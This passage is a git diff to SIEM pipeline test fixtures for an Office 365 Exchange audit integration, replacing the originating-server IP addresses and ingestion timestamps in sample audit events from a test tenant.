FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, 
FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -242,7 +242,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB7PR01MB4428 (15.20.207.31)\n", + "OriginatingServer": "DB7PR01MB4428 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", 
@@ -254,7 +254,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, 
FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -284,7 +284,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "DB3PR0102MB3500 (15.20.225.32)\n", + "OriginatingServer": "DB3PR0102MB3500 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", 
@@ -296,7 +296,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, 
FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -326,7 +326,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "AM6PR01MB4535 (15.20.225.32)\n", + "OriginatingServer": "AM6PR01MB4535 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", 
@@ -338,7 +338,7 @@ }, { "event": { - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, 
FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "ClientIP": "::1", @@ -368,7 +368,7 @@ "Operation": "ModifyFolderPermissions", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "AM6PR01MB4535 (15.20.225.32)\n", + "OriginatingServer": "AM6PR01MB4535 (67.43.156.13)\n", "RecordType": 2, "ResultStatus": "Succeeded", "UserId": "S-1-5-18", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json index c815879b311..563eacc3772 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json @@ -2,12 +2,12 @@ "expected": [ { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "AM6PR01MB4535", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" 
@@ -56,7 +56,7 @@
 "related": {
 "ip": [
 "::1",
- "15.20.225.32"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -72,8 +72,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695625Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png (1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659926900Z", + "original": 
"{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png (1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -94,12 +94,12 @@ }, { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "DB3PR0102MB3500", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" 
@@ -148,7 +148,7 @@
 "related": {
 "ip": [
 "::1",
- "15.20.225.32"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -164,8 +164,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695632800Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659935500Z", + "original": 
"{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", 
@@ -186,12 +186,12 @@
 },
 {
 "server": {
- "address": "15.20.207.31",
+ "address": "67.43.156.13",
 "domain": "DB7PR01MB4428",
- "ip": "15.20.207.31"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.31"
+ "ip": "67.43.156.13"
 },
 "source": {
 "ip": "::1"
@@ -240,7 +240,7 @@
 "related": {
 "ip": [
 "::1",
- "15.20.207.31"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -256,8 +256,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695635200Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659941200Z", + "original": 
"{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is 